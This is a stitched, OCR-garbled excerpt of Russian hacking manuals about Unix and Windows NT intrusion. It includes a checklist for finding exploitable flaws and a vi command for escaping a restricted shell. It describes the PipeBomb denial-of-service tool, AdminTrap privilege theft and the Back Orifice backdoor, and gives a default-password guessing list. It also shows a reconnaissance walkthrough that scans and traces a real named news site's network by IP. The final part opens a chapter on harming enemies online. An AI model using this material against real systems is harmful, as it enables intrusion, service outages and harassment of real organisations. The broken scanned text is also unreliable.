Глава 6.
Дефекты в системе безопасности
Дефекты в системе безопасности бывают нескольких видов:
Физические дефекты
В этом случае проблема состоит в возможности получения нелегального
доступа к системе и, как последствия, компьютерного хулиганства
и вандализма. Вот вам хороший пример - сетевая рабочая станция,
которая при отсутствии должных предосторожностей может быть переведена
взломщиком в режим single-user (единичного пользователя) с одновременным
уничтожением всей файловой системы.
Еще один пример - обеспечение сохранности конфиденциальной
информации на различных носителях, которые, несмотря на установленные
к файлам разрешения, вполне могут быть прочитаны любым
пользователем системы, имеющим доступ к соответствующему сегменту
диска.
Дефекты программного обеспечения
Здесь основная проблема заключается в ошибках в «привилегированных
» программах (демоны, установки для сгоп), чьи функции могут
быть задействованы при взломе системы. Самый известный пример -
это «sendmail debug», который позволяет хакеру запускать корневую оболочку.
При этом может быть удалена файловая система, создан новый
аккаунт, скопирован файл passwrd, короче, все, что только можно придумать
(вопреки общему мнению, взлом, аналогичный sendmail, не ограничивается
только небезызвестным «Internet Worm», это вполне осуществимо
и при запуске telnet через 25 порт атакуемого компьютера.
Новые «дыры» в системе безопасности появляются чуть ли не ежедневно,
поэтому самое лучшее, что вы можете сделать, это:
a) постараться структурировать свою систему таким образом, чтобы
даже самые незначительные программы работали только под привилегиями
root/daemon/bin, а если существует необходимость прописать
софт под других пользователей, то убедитесь, что их аккаунты не поддаются
взлому.
b) подпишитесь на рассылку, где публикуется информация об интересующих
вас проблемах, и таким образом вы сможете вовремя отреагировать
на обнаруженный дефект.
118 Взлом Unix
При установке/обновлении данной системы старайтесь устанавливать/
делать запускаемыми только действительно необходимые вам
программы, которые нужны вам сейчас или которыми вы точно станете
пользоваться. Многие пакеты содержат демоны и утилиты, позволяющие
посторонним лицам считывать информацию. К примеру, пакет
AT&T System V Unix включает в себя программу acctcom(l), в которой
установки по умолчанию предоставляют одному пользователю свободный
доступ к учетным данным другого. Многие пакеты TCP/IP автоматически
инсталлируют/запускают такие программы, какrwhod, fingerdи
<иногда> tftpd, использование которых может повлечь за собой серьезные
проблемы с обеспечением безопасности системы.
Решение этих проблем заключается в тщательно продуманном
администрировании системы. Большинство подобных программ инициализируется/
запускается во время начальной загрузки; вы можете изменить
сценарии начальной загрузки (обычно расположенные в каталогах
/etc, /etc/re, /etc/rcX.d) для предотвращения их запуска. Вы также
можете просто удалить некоторые из этих программ. Для ряда утилит
предотвратить несанкционированный запуск может простая команда
chmod(l).
Глава 7.
Не доверяйте сценариям/программам
инсталляции
Подобные средства обычно загружают сразу весь пакет без дифференцированных
запросов. В большинстве случаев в документации к инсталляции
есть список всех программ пакета; ознакомьтесь с ним.
Дефекты из-за совместимости оборудования
Иногда недостаточный профессионализм системного менеджера
приводит к использованию таких комбинаций «железа» и «софта», которые
позволяют взломщикам преодолевать все защитные системы. По сути
дела, это пример «погони за двумя зайцами», естественно, ни один из
зайцев в конечном счете не попадает в ловушку, на зато в систему попадает
незванный гость.
После полного завершения установки оборудования обнаружение
подобных «дыр» в системе безопасности становится для системного администратора
настоящей головной болью, поэтому лучше всего следить
за появлением этих моментов с самого начала работы машины. Впрочем,
никогда не поздно вернуться на несколько шагов назад.
Взлом Unix 119
Ниже разобраны некоторые примеры; но давайте не будем сейчас
на этом останавливаться, дабы не испортить впечатление.
Выбор стратегии защиты и ее применение
Четвертый вид проблем с безопасностью касается адекватного
восприятия. Хорошие программы, защищенное «железо», но вполне
совместимые компоненты системы не заработают, если только вы не выберете
соответствующую стратегию защиты и не включите отвечающие
за безопасность сегменты системы. Даже использование самого лучшего
на свете механизма паролирования не даст никакого результата, если ваши
пользователи считают лучшим паролем свой собственный логин! Безопасность
- это взаимодействие общей стратегии (или стратегий) и согласованных
с ней операций.
Глава 8.
Мысли о хакинге Unix
Важно: Вся предлагаемая информация должна быть распределена
по следующим категориям:
1) Общие принципы.
2) Поиск дефектов в src.
3) Просмотр в двоичных распределениях.
4) Просмотр специальных конфигураций сайта.
Некоторые пункты классификации напрашиваются сами собой:,
1) SUID/SGID.
2) Коды завершения/условия ошибки..
3) Непредвиденный ввод.
4) Параметры маршрутизации.
5) Проверка на аутентичность.
6) Имплицитное доверие.
7) Параметры.
8) Разрешения.
9) Прерывания.
10) Ввод/вывод.
120 Взлом Unix
11)Символические связи.
12) Демоны, особенно доступные пользователям.
13) Параметры маршрутизации в ядре.
Предложенную схему можно разбить на категории и подкатегории:
I: Suid-бииарыи сценарии
а) Непредвиденные действия пользователя.
б) Свободные подключения.
в) Имплицитные предположения о внешних условиях (ссылки
sym, loc.-пути).
г) Параметры маршрутизации.
II: Демон, функционирующий со SUID
а) Параметры маршрутизации.
б) Недостаточная защита файла.
в) Имплицитная защита файла.
г) Доверие.
д) Аутентичность.
III: Проблемы ядра
а) Параметры маршрутизации в ядре.
б) Код драйвера устройства.
Ниже рассматривается четырехэтапныЙ метод, разработанный
System Development Corporation и дающий 65%-ную гарантию обнаружения
дефектов в системе безопасности. Поиск таких «дыр» в операционной
системе включает четыре этапа:
Этап 1
Изучение структуры управления данной конкретной системы.
Чтобы найти лазейки в системе безопасности и определить ее дефекты,
необходимо четко уяснить структуру управления системы и ее
уровни.
Взлом Unix 121
Вот что нужно знать:
A) Объекты защиты: то, что надо защитить. Например: файлы
пользователей.
B) Объекты управления: то, что защищает объекты защиты. Например:
i-node (индексные дескрипторы).
C) Смешанные объекты: объекты, подпадающие под обе категории.
Например: файл пароля.
С таким списком в руках становится возможным графически воспроизвести
всю иерархию управления и определить вероятные пути
взлома. Очень действенно и создание диаграмм для визуализации возможного
прерывания связей.
Найти необходимую информацию можно в различных пользовательских,
операторских и администраторскихмануалах.
Довольно полезным может оказаться и изучение исходного кода.
Для тех, кто пользуется нелицензированными продуктами, советуем использовать
дистрибутивы LINUX, NET2 и BSD386. В будущем, возможно,
станет реальностью рабочий контракт между отдельным лицом или
компанией, обладающими легальными дистрибутивами, и другими
участниками этого проекта. Таким образом, фрагменты кода могут быть
использованы в учебных (академических) целях постольку, поскольку
они не используются для извлечения прибыли - впрочем, это необходимо
проверить.
Этап 2
Создание списка возможных дефектов (то есть предполагаемых
дефектов).
Хронология кода
В чем состоит различие версий UNIX? Это бывает важно при создании
перекрестных ссылок (очень часто некий продавец вносит в пакет
изменения, а его версия получает широкое распространение).
Жесткая перекрестная ссылка
Командой who проверьте OS на наличие ошибок и установите, ка¬
кая версия поможет вам избежать двойной работы.
Хорошо бы сначала вывести полный список всех suid-бинаров
в различных версиях OS. Затем попытайтесь выяснить причину опреде-
ления suid к каждой конкретной программе. Например: гср имеет корне-
вой suid, потому что использует привилегированный порт для установле-
122 Взлом Unix
ния аутентичности пользовательских имен. Часто код, изначально созданный
не как suid, функционирует именно как suid, манипулируя каналами
для разрешения проблем с доступами файлов.
Хорошо бы разработать базу данных, которая бы сравнивала парные
и тройные данные, как-то: название программы, suid, sgid, объект
обращения (почему данная программа работает под suid/sgid), версия OS
и ее происхождение.
ЭтапЗ
Проверка предположений. (Тестирование системы на предмет обнаружения
дефектов).
Этап 4
Обобщение полученной информации с акцентированием специфических
проблем данной системы.
Глава 9.
Обнаружение отдельных дефектов
1) Ищите подпрограммы, которые не проверяют диапазоны или
параметры ввода.
Например: семья подпрограмм gets, позволяющая перезаписывать
границы буферов (sprintf()?, gets () и т.д.). А также strcpy (), вмонтированная
в большинство src:
«define SCYPYN((a)(b)) strcpy(a, b, sizeof(a))
2) SUID/SGID подпрограммы, написанные в одной из оболочек
вместо С или PERL.
3) SUID/SGID подпрограммы, написанные в PERL и не использующие
программу taintperl.
4) SUID/SGID подпрограммы, использующие system(), popen(),
ехес1р() или execvp() при выполнении заданий.
5) Любая программа, которая использует относительные имена
пути.
6) Использование относительных имен путей для определения динамически
связанных библиотек.
Взлом Unix 123
7) Подпрограммы, не проверяющие ошибки в кодах возврата при
системных вызовах. (Например: fork(2),suid(2),setuid() как в знаменитой
ошибке гср).
8) Дефекты часто могут быть обнаружены в коде, который:
а) импортирован в новую среду;
б) получил несанкционированный ввод;
в) взаимодействует с другим локальным программным обеспечением;
г) обращается к системным файлам, подобным passwd, L.sys и т.д.;
д) считывает входные данные из свободно перезаписываемого
файла/каталога;
е) представляет собой одну из программ диагностики, которые чаще
всего не позволяют пользователю защищать информацию.
9) Тестирование кода на предмет несанкционированного доступа.
•Средства для этого, включая различные утилиты, вполне доступны.
10) В man-страницах и в различных руководствах просмотрите параграфы
с предупреждениями против выполнения того-то и изменения
сего-то. Обратите внимание на разделы «Ошибки».
11) Поищите редко используемые или необычные функции или
команды - например, чтение в обратном направлении.
В частности, интересные результаты может дать поиск не нашедших
отражение в инструкциях флагов/аргументов.
Проверьте флаги, работающие в более ранних выпусках вашей
операционки или в других OS-версиях. Проверите опции, которые могут
быть использованы другими программами. Например, telnet использует
опцию -h для входа в систему... ладно, пропишите в login.c:
i f ( ( g e t u i d ( ) ) && tiflagX
syslogO
exit()
}
12) Просмотрите условия маршрутизации.
13) Отключите часть софта, и тем самым вы проверите, действительно
ли она, эта часть, связана с предполагаемым вами программным
обеспечением или аппаратным модулем.
124 Взлом Unix
14) Отладьте процесс обнаружения ошибок так, чтобы он не отражался
на системе безопасности.
15) Недостаточная отлаженность, приводящая, например, к созданию
неверных условий проверки кодов.
16) Имплицитное доверие: подпрограмма В принимает параметры
подпрограммы А, потому что подпрограмма А является системным процессом.
17) Память системы - это данные или ссылка на параметры пользователя
в адресном пространстве пользователей.
18) Интерсвязь во время процессов: возвращение условий (passwd
OK, illegal parameter, segment error и т.д.) может стать источником серьезных
проблем, особенно вкупе с П. 17.
19) Параметры пользователя не поддаются адекватной проверке.
20) Адреса, перекрывающие друг друга или обращающиеся к другим
областям системы.
21) Пропуск проверки.
22) Сбой системы предупреждения о необычных параметрах.
23) Найдите уровни системы, в которых ряд модулей был написан
различными программистами или группами программистов - обязательно
обнаружатся «дырки».
24) Регистраторы, указывающие на месторасположение значений
параметра вместо того, чтобы передать это значение непосредственно.
25) Любая программа, функционирующая с системными привилегиями.
(Слишком много программ имеют UID 0, что облегчает доступ
к некоторым таблицам и проч.)
26) Группа свободночитаемых временных файлов, буферов и т.д..
27) Неотлаженность пороговых значений и регистрации.
28) Изменение параметров особо важных областей системы до их
выполнения одновременно запущенным процессом (условия маршрутизации).
29) Неадекватная проверка границы при компиляции, например,
в случае, когда пользователь может запустить машинный код, оформленный
как общие данные в области данных (если текстовая область и область
данных разделены).
Взлом Unix 125
30) Неправильное прерывание пользователем работы компьютера.
Большинство пользователей сначала или прерывают выполняемый процесс
или доводят его до конца, а уже потом выключают компьютер, в то
время как другие, не закончив корректно свою работу, оставляют систему
фактически в незащищенном состоянии, оставляя открытыми файлы,
в которых велась запись.
31) Код, использующий fopen(3) без установки umask. (Например:
а1(1)идр.)
Вообще любой код, не перезапускающий UID перед началом параллельного
действия.
32) Trace - ваш хороший помощник (или truss в SVR4). Он выясняет,
какие системные вызовы используются программой.
33) Тщательно проверьте /usr/local. Многие администраторы устанавливают
программное обеспечение из сети. Часто вы найдете здесь
tcpdump, top, nfswatch... они запросто могут использовать корневой
suid.
34) Проверьте программы под suid и убедитесь, что они являются
именно теми самыми продуктами, которые были установлены сначала.
Администраторы иногда меняют пароли, что менее безопасно, чем дистрибутивная
версия.
35) Найти программы, устанавливающие программное обеспечение
или загружаемые модули ядра.
36) Вообще динамически связанные программы. Вспомните
LD PRELOAD, думаем, что это еще не предел.
37) Программирование канала I/O - вот, что сейчас главное.
Ищите логические ошибки, противоречия и удаления.
38) Если возможно, отследите в I/O программе наличие возможности
самостоятельного модифицирования и запуска циклов (pre-load
может помочь это осуществить это).
39) Если каналы I/O действуют как независимые процессоры, то
они могут иметь неограниченный доступ к памяти, и таким образом системный
код может быть изменяться в памяти еще до своего выполнения.
40) Найдите ошибки, существующие во многих частях программного
обеспечения. К примеру, скажем, программа А может быть использована
для изменения файла конфигурации /etc/a, программа В принимает
эту информацию без проверки, и все это может привести
126 Взлом Unix
к непредвиденным результатам (только посмотрите, сколько программ
доверяют /etc/utmp).
41) Любые программы, особенно допускающие выход из оболочки
и идущие под suid/sgid.
Глава 10.
Взламываем ограничивающую оболочку
При некачественно выполненной ограничивающей оболочке
можно взломать ограничивающую среду, выполнив программу, которая
показывает функцию оболочки. Хороший пример vi (простой текстовый
редактор). Выполните vi и используйте следующую команду:
:set shell = /bin/sh
Затем shell, использующий эту команду:
:sheU
Если ваш ограниченная оболочка не позволяет использовать команду
cd, зайдите через ftp на самого себя, и вы получите доступ к использованию
cd.

Глава 7.
Программа PipeBomb
Прикладная программа PipeBomb производит открытие на запись
в вечном цикле новых экземпляров определенного системного канала и
записывает в них порции бесполезной информации. Через довольно короткий
промежуток времени все свободные экземпляры канала будут заняты,
после чего серверный процесс определяет, что все экземпляры его
канала заняты, после чего начинает создавать новые экземпляры канала.
Каждый новый экземпляр канала обслуживается новым потоком
•(thread), под который отводится новый буфер в оперативной памяти для
хранения информации. Клиентский процесс постоянно открывает новые
экземпляры канала, поэтому серверному процессу приходится создавать
новые потоки. Это приводит к максимальной загрузке процессора
сервера, а объем свободной оперативной памяти этого компьютера
быстро уменьшается. Через несколько минут атакованный компьютер
становится практически неработоспособным. Данная программа одинаково
эффективно работает для атак как на рабочие станции, так и на сервера
Windows NT 4.0. Для начала атаки необходимо запустить программу
PipeBomb и в поле ввести имя атакуемого компьютера.
Затем следует нажать кнопку «Create» (Создать) или «Write» (Записать),
после чего любой сервер Windows NT будет завешен в течение
двух минут.
140 Взлом Microsoft Windows 2000
Эту атаку можно применять через Internet, инкапсулируя пакеты
SMB в пакеты TCP/IP (сетевая составляющая интерфейса Named Pipe
File System организована как надстройка над протоколом SMB).
Глава S.
Программа AdminTrap
Программа AdminTrap производит создание троянского экземпляра
одного из системных каналов и ждет, когда к нему подключится клиент.
Затем AdminTrap выполняет вызов функции Win32 «ImpersonateNamedPipeClient
», которая назначает маркер доступа (access token) клиента
экземпляра канала, handle серверного конца которого указан в качестве
параметра функции. Если выполнение функции прошло успешно, один
из потоков программы AdminTrap получает полномочия пользовате-
ля-клиента троянского экземпляра канала.
Вероятность того, что программа AdminTrap после вызова «ImpersonateNamedPipeClient
» получит полномочия администратора, весьма велика,
если случайно удастся перехватить следующие сетевые соединения:
• winreg - удаленное управление реестром, списком
сервисов, репликацией и административными
оповещениями (alerts), удаленный просмотр системных
журналов, удаленное диагностирование и оценка
производительности;
• spoolss - удаленное управление принтером.
После запуска программа ожидает подключения администратора.
Когда администратор начнет выполнять одну из административных
операций, сетевое соединение администратора перехватывается,
программа выдает на экран окно, содержащее имя и список привилегий
этого администратора, и предлагает осуществить создание нового пользователя
с именем AdminTrap, который входит в группу «Administrators».
Глава 9.
Использование средства удаленного
управления Back Oriffice 2000
Программа Back Orifice (дословный перевод - задний проход) является
еще одним средством взлома серверов Windows NT и удаленного
управления ими через Internet. B02K состоит из клиентской, серверной
Взлом Microsoft Windows 2000 141
части и утилит, позволяющих добавлять некоторые новые функции
и производить настройку серверной части.
Данное программное обеспечение может работать на компьютерах
с установленными операционными системами Windows 95/98
и Windows NT.
Клиентская часть ВО2К (файл bo2kgui.exe) используется на компьютере
хакера и позволяет получить доступ к машине с установленной
серверной части по протоколам TCP или UPD по порту 31337.
Обычно перед внедрением серверной части (размер 120 Кб) производится
сканирование подсети и выявление конкретного IP-адреса.
Затем серверная часть запускается на сервере при помощи любого локального
бюджета. Хакер, используя клиентскую часть, может выполнять
следующие действия:
• производить редактирование реестра;
• осуществлять полный контроль над файловой системой
через браузер;
• получать информацию о введенных паролях;
• просматривать текущее состояние экрана на сервере;
• просматривать сетевые ресурсы, подключенные к серверу;
• управлять системными процессами;
• выполнять удаленную перезагрузку;
• удаленно выполнять программы с возможностью
перенаправления консоли на компьютер хакеру.
Перед внедрением серверная часть конфигурируется при помощи
Мастера конфигурирования ВО2К Configuration Wizard (файл bo2kcfg.exe).
Мастер ВО2К Configuration Wizard позволяет выбрать файл сервера ВО2К
(Ьо2к.ехе)и задать пароль, который затем будет использоваться для доступа
по сети. Кроме того, мастер позволяет выбрать порт для IP-соединения,
метод шифрования соединений между клиентом и сервером. Вам необходимо
указать, какой сетевой модуль будет использоваться в
IP-соединениях TCP или UPD. TCP-соединения обычно используются
для организации управления через сеть Internet. UPD-соединенияприменяются
для работы в ЛВС.
142 Взлом Microsoft Windows 2000
Кроме того, данная утилита используется для добавления к основному
запускаемому модулю bo2k.exe дополнительных возможностей, которые
реализованы в виде Plugins DLL.
Глава 10.
Удаленный взлом Windows NT через Internet
Самым трудным взломом Windows NT считается удаленный взлом
через Internet. В самом начале у атакующего отсутствует вообще какая-
либо информация, кроме имени хоста и его IP-адреса. Если на удаленном
сервере работает Web-сервер, вы тоже сразу же сможете интуитивно
определить, с какой операционной системой вы имеете дело. Для
этого следует, используя браузер, провести исследование страничек и отрытых
для просмотра каталогов Web-сервера. Для Web-серверов HS
3.0/4.0/5.0, которые являются продуктами Microsoft и работают исключительно
под Windows NT, характерны следующие особенности:
Web-страницы имеют расширения *.htm, *.asp; страницы имеют кодировку
Winl253, а не KOI8-R (для русскоязычных страниц) и прочие косвенные
признаки.
Кроме того, следует тщательно просмотреть структуру каталогов
документов и скриптов. Каталоги документов, в которых отсутствуют
файлы ind&cMm, покажут вам полный список файлов и расположенных
ниже директорий. Случайно бродя по Internet^ вы можете случайно наткнуться
на такой Web-сервер новостей штата Айдахо: http://www.idahonews.
com/, который полностью соответствует описанным критериям.
Но самое смешное то, что у этого сервера открыты для просмотра каталоги
скриптов scripts и cgi-bin.
Если каталоги скриптов scripts и cgi-bin открыты для просмотра, то
этот сервер - просто находка для опытного хакера. Используя браузер,
удаленный клиент может запускать любые файлы из этих директорий на
Web-сервере. Остается каким-либо способом загрузить одну из программ,
описанных раннее, в каталоги скриптов scripts и cgi-bin. Для этого
исследуем открытые каталоги более подробно.
Как вы можете видеть, открытый каталог cgi-bin позволил нам по¬
лучить информацию о том, что данный сервер Windows NT использует
язык Perl. Используя обычный браузер, вы можете скачать все скрипты
из этих директорий и произвести их анализ на получение различного рода
информации об удаленном сервере. Кроме того, в каталоге cgi-bin находится
подкаталог MSWin32-x86-object. Войдем в него и просмотрим
его содержимое.
Взлом Microsoft Windows 2000 143
Как мы видим, подкаталог MSWin32-x86-objectсодержит инсталлированную
версию языка Perl 5.0, а также сам дистрибутив Perl
5.00502.exe. Затем скачаем из этой директории файл регистрации ошибок
PerlIS-Err.log:
*** -E:\docs' error message at: 1998/11/24 13:23:57
Can't open perl script "E:\does": Permission denied
. . . 'E:\docs- error message at: 1998/12/25 04:49:16
Can't open perl script "E:\docs": Permission denied
. . . -E:\docs' error message at: 1999/03/26 16:05:43
Can't open perl script "E:\docs": Permission denied
. . . 'E:\docs' error message at: 1999/09/08 11:39:54
Can't open perl script "E:\docs": Permission denied
-. 'E:\docs' error message at: 1999/09/08 11:58:34
Can't open perl script "E:\<tocs": Permission denied
. . . •E:\docs\idaho8' error message at: 1999/10/25 13:51:51
Can't open perl script "E:\docs\idaho8": Permission denied
Конечно, данный журнальный файл дает не слишком много информации,
кроме той, что основные документы расположены на диске
Е: в каталоге docs, и также Perl.exe использовался раннее для неудачных
попыток проникновения в систему. Затем следует просмотреть документацию
в сети Internet по ошибкам и дырам в реализации Perl 5.0 для
Windows NT и, исходя из этого, произвести анализ находящихся в каталогах
scripts и cgi-bin *.р1-скриптов.
Производим просмотр каталога scripts.
Открытый каталог scripts дает нам следующую информацию:
• Подкаталог/scripts/centralad/ содержит средства для
централизованного администрирования какой-то
информационной системы.
• Подкаталог scripts/iisadmin/ содержит HTML-версию для
администрирования Web-сервера IIS, которая очень может
пригодиться при взломе системы.
• Подкаталог scripts/tools/ содержит различные утилиты для
IIS.
• Файл General.mdb - файл базы данных Microsoft Access,
говорит о том, что, возможно, на сервере установлена
СУБД MS Access;
• Файлы PASSWRD2.EXE и PASSWRD2.CPP имеют очень
странное имя PASSWRD2.*, которое напоминает один
из известных хакерских инструментов. Создается
144 Взлом Microsoft Windows 2000
впечатление, что данный сервер уже ломали раннее, т.к.,
возможно, эти файлы были загружены на сервер хакерами.
Затем можно просканировать данный хост на наличие открытых
портов и, следовательно, сервисов, на нем установленных. Для сканирования
портов вы можете использовать следующие сканеры портов
Windows:
•
•
•
•
•
•
•
•
7th Sphere PortScanv 1.1
All Around Internet
Ogre v0.9b
Port Scannerv 1.1
PortScan Plus
SiteScan by Rhino9/Intercore
TCP Port Scanner
UltraScanvl.2.
Данные утилиты вы можете получить со страницы --..
248.19:81/hack/genar/archive5.html. Наиболее полезным и простым сканером
портов является Ogre v0.9b (Rhino9). Другие сканеры портов под
Windows или UNIX вы сможете отыскать при определенном упорстве
в сети Internet.
Утилита Ogre обеспечивает взломщика эффективным инструментом
для сбора информации об уязвимых местах для серверов Windows NT
и прочих хостов Internet.
Ogre позволяет выполнить ряд тестов для выбранной подсети
класса С и проверить хосты на известные дыры в операционных системах
Windows 95 и Windows NT, а также в установленном программном
обеспечении. Утилита Ogre позволяет:
• Определить активные хосты в данной подсети класса С;
• Просмотреть выявленные хосты, чтобы определить
доступные удаленные службы и порты, по которым к ним
можно обратиться;
• Получить информацию относительно состояния netbios
(Nbtstat);
• Просмотреть доступные сетевые ресурсы, выделенные
в совместное использование (net view);
Взлом Microsoft Windows 2000 145
• Проверить существование серверных расширений
Microsoft Frontpage;
• Проверить присутствие в системе средства
администрирования НТМЬдляШ;
• Проверить существование индексированных по
умолчанию документов Index Server.
Глава 11.
Использование утилиты Ogre для проверки
подсети сервера новостей штата Айдахо
Перед использованием этой утилиты необходимо получить IP-адрес
сервера http://www.idahonews.com/.
Для этого выполним команду ping wwwidahonews.com:
Pinging wwwidahonews.com [198.60.102.4] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.
IP-адрес сервера отображается через DNS, однако ping не проходит.
Это означает, что данный сервер прикрыт firewall'OM и сканирование
его портов будет неудачным. Однако сканирование данной подсети позволит
выявить другие сервера домена idahonews.com.
Для тестирования подсети, в которой находится сервер новостей
штата Айдахо, введем первый адрес подсети в IP в поле «Starting IP» (Начальный
IP-адрес) 198.60.102.1. Затем введем последний адрес подсети в
«Ending Octet» 254 (Конечный октет). Для начала сканирования нажмем
кнопку «Start scan» (Начать сканирование).
После сканирования получим следующие результаты:
Scanning - 198.60.102.1
Commencing Port Scan:
Port 21: Closed
Port 23: Open
Port 25: Closed
'Port 53: Closed
Port 79: Open
146 Взлом Microsoft Windows 2000
Port 80: Closed
Port 110: Closed
Port 111: Closed
Port 139: Closed
Port 443: Closed
Port 1080: Closed
Port 8181: Closed
Scanning - 198.60.102.2
• I n a c t i v e IP address*
Scanning - 198.60.102.3
•Inactive IP address*
Scanning - 198.60.102.4
„ • . IP address*
Scanning - 198.60.102.5
Commencing Port Scan:
Port 21: Closed
Port 23: Closed
Port 25: Open
Port 53: Open
Port 79: Open
Port 80: Closed
Port 110: Open
Port 111: Closed
Port 139: Closed
Port 443: Closed
Port 1080: Closed
Port 8181: Closed
Scanning - 198.60.102.6
*Inactive IP address*
Scanning - 198.60.102.38
Взлом Microsoft Windows 2000 147
. I n a c t i v e IP address*
Scanning - 198.60.102.39
Commencing Port Scan:
Port 21: Closed
Port 23: Closed
Port 25: Open
Port 53: Open
Port 79: Open
Port 80: Closed
Port 110: Open
Port 111: Closed)
Port 139: Closed
Port 443: Closed
Port 1080: Closed,
Port 8181: Closed
Scanning - 198.60.102.40
i n a c t i v e IP address*
Scanning - 198.60.102.54
. I n a c t i v e IP address*
Scanning - 198.60.102.55
Commencing Port Scan:
Port 21: Closed
Port 23: Closed,
Port 25: Open
Port 53: Open
Port 79: Open
Port 80: Closed
Port 110: Open
Port 111: Closed
Port 139: Closed
Port 443: Closed
Port 1080: Closed
148 Взлом Microsoft Windows 2000
Port 8181: Closed
Scanning - 198.60.102.56
.Inactive IP address*
Scanning - 198.60.102.254
«Inactive IP address*
Идеальным вариантом при взломе Windows NT были бы открытые
порты 135-139. Тогда бы мы смогли получить массу познавательной информации
о сервере, его сервисах и прочих ресурсах. Однако при сканировании
мы получили:
Scanning - 198.60.102.4
.Inactive IP address*
Действительно, данный сервер прикрыт firewaUoM. Попробуем
определить его тип, выполнив трейсинг соседних активных хостов. Для
этого выполним команду tracert 198.60,102.1 (для UNIX команда traceroute):
Tracing route to cisco.idahonews.com [198.60.102.1]over a maximum
of 30 hops:
11 240 ms 241 ms 240msgbr2-p01.wswdc.ip.att.net
,[12.123.8.241] 12 261 ms 260 ms 251 ms gbr1-p40.oc-
48.зШс, ip.att.net [12.122.2.82] 13 330 ms 301 ms 390 ms
gbr2-p50.oc-12.sffca.ip.att.net [12.122.3.17] 14 301 ms 320 ms
311 msar2-a3120s4.sffca.ip.att.net [12.127.1.145] 15 401 ms
350 ms 351 ms 12.126.207.46 16 381 ms 350 ms 371 ms
cisco.idahonews.com [198.60.102.1]
Trace complete
Еще одной распространенной ошибкой администраторов небольших
сетей является манера давать названия хостам, исходя из выполняе-
мой ими функции. Благодаря этому мы получили информацию, что хостом
по адресу 198.60.102.1 является Firewall корпорации Cisco. Его так
просто не хакнешь. Хотя, конечно, существует шанс, что ленивый админ
забыл сменить заводской пароль. У хоста cisco.idahonews.com открытыми
являются полученные при сканировании Ogre порты: 23 (Telnet), 79.
Затем выполним команду tracert 198.60.102.5:
Tracing route to router.idahonews.com [I98.60.l02.5]over a maximum
of 30 hops:
Взлом Microsoft Windows 2000 149
12 260 ms 270 ms 261msgbr1-p40.oc-48.sl9mo.ip.att.net
[12.122.2.82113 321 ms 310 ms 300 ms gbr2-p50.oc-
12.sffca.ip.att.net [12.122.3.17] 14 310 ms 321 ms 320 ms ar2-
a300s3.sffca.ip.att.net [12.127.5.177] 15 341 ms 340 ms 371 ms
12.126.207,34 16 371 ms * * 198.60. 104. 181 17 361 ms
361 ms 370 ms router.idahonews.com [198.60.102.5]
Trace complete
Опять мы получили информацию, что хостом по адресу 198.60.
102.5 является маршрутизатор router (который может быть реализован в
виде аппаратного устройства или обычного UNIX-роутера). У хоста
router.idahonews.com открыты порты: 25 (SMNP-почта), 53 (DNS-cep-
вер), ПО (POP-сервер). Исходя из открытых портов, можно с уверенностью
заявить, что данный сервер является почтовым и DNS-сервером.
Можно с большой уверенностью сказать, что данный маршрутизатор передает
пакеты во внутреннюю локальную подсетку idahonews.com
192.168.0.*.
Трассировка других хостов подсетки 198.60.102.6-253 дала информацию,
что другие IP-адреса не имеют никакого отношения к домену
idahonews.com.
Как мы видим, полученной полезной информации явно не хватает
для проникновения в систему. Для взлома wwwidahonews.com необходимо
собрать наиболее полную информацию обо всех трех хостах.
Кроме того, взлом Firewall'oB Cisco и Unix-роутеров выходит за границы
данной темы. Поэтому мы рассмотрим идеальный вариант, при котором
сервер Windows NT не был бы прикрыт Firewall'oM и порты 135-139 были
бы открыты.

Хакерские трюки
Глава 1.
Классификация методов взлома
компьютеров
Допустим, что вы имеете какой-либо доступ к сети и хотите расширить
свои возможности путем проникновения на другие компьютеры
или повысив свои права на машине, с которой вы работаете. Поэтому все
методы взлома делятся на две группы:
Методы для проникновения на компьютер из сети
• Подбор пароля. Критерий - время. Следует иметь в виду
то, что обычно на большинстве UNIX login с удаленного
терминала пользователю root запрещен. Поэтому обычно
подбирают пароли обычных пользователей.
• Использование ошибок операционных систем для
получения информации о пользователях на машине
(например, login&password).
• Использование сканирования проходящих в сети пакетов
(sniffing), для получения информации о пользователе(-ях)..
• «Троянские кони» - программы, содержащие в себе некий
«довесок» и «подаренные» на атакуемую машину.
• Один из новых способов: использование ошибок в
WWW-обозревателях и возможностей новых элементов
WWW-страниц - JAVA, ActiveX. В этих недавно
появившихся средствах создания интерактивных
WWW-страниц используется технология перекачки некого
кода и/или скрипта на машину пользователя и затем их
автоматический запуск.
Методы повышения своих прав на компьютере
В этом случае все зависит от операционной системы компьютера,
на котором вы хотите добиться повышенных привилегий. У каждой есть
свои дыры; про стандартные не имеет смысла рассказывать, разве что
Хакерские трюки 155
в качестве классических примеров, и они уже давно заткнуты, про остальные,
естественно, никто не расскажет - т.к. их тут же заткнут, так
что ищите. Это могут быть, например:
• Некорректно написанные программы (не проверяющие на
корректность вводимые данные, имеющие
недокументированные команды, флаги и т.д.).
• Неправильные права доступа к системным файлам и
директориям (например, при инсталляции QNXвсе
системные директории имеют флаги rwxrwxrwx, а автор
программы mqc заботливо оставил виШ'ный командный
файл с такими же атрибутами).
В компьютерном мире существуют много организаций, занимающихся
нахождением и информированием об ошибках и дырках в операционных
системах, в целях их скорейшего нахождения и исправления
системными администраторами, но кто мешает хакеру тоже получать такого
рода информацию? Обычно немедленное использование полученной
информации дает результаты.
Глава 2.
Стандартные пароли в операционных
системах
В некоторых случаях возможен подбор пароля для входа в систему.
До недавнего времени пользователи выбирали пароли, которые легко запомнить,
или даже оставляли те, которые стоят в системе по умолчанию
при инсталляции. Если у вас не хватает фантазии, вы можете поэкспериментировать
с этим списком:
admin, arm, anon, anonymous/anonymous, backup, batch, bin,
checkfsys, daemon, demo, diag, field, f t p , games,
guest/guest, guest/anonymous, help, install, listen, lp,
lpadmin. maint. makefsys, mountfsys, network, news, nobody,
nuucp, nuucpa, operator, powerdown, printer, pub, public,
reboot, rje, rlogin, root, sa, setup, shutdown, startup,
sync, sys/sys, sysadm, sysadmin, sysbin/sysbin, sysbin/bin,
sysman, system, tech, test, trouble, t t y , umountfsys,
user/user, userl/userl, uucp, uucpa, visitor.
Также очень часто пользователи используют в качестве пароля
свое имя, фамилию или вообще его не ставят.
156 Хакерские трюки
Глава 3.
Как навредить недругу с помощью Internet
В качестве инструмента мести Internet идеален. Он представляет
массу доселе не использованных возможностей. Думается, что даже такие
заслуженные специалисты в этом вопросе, как герои «Трех мушкетеров
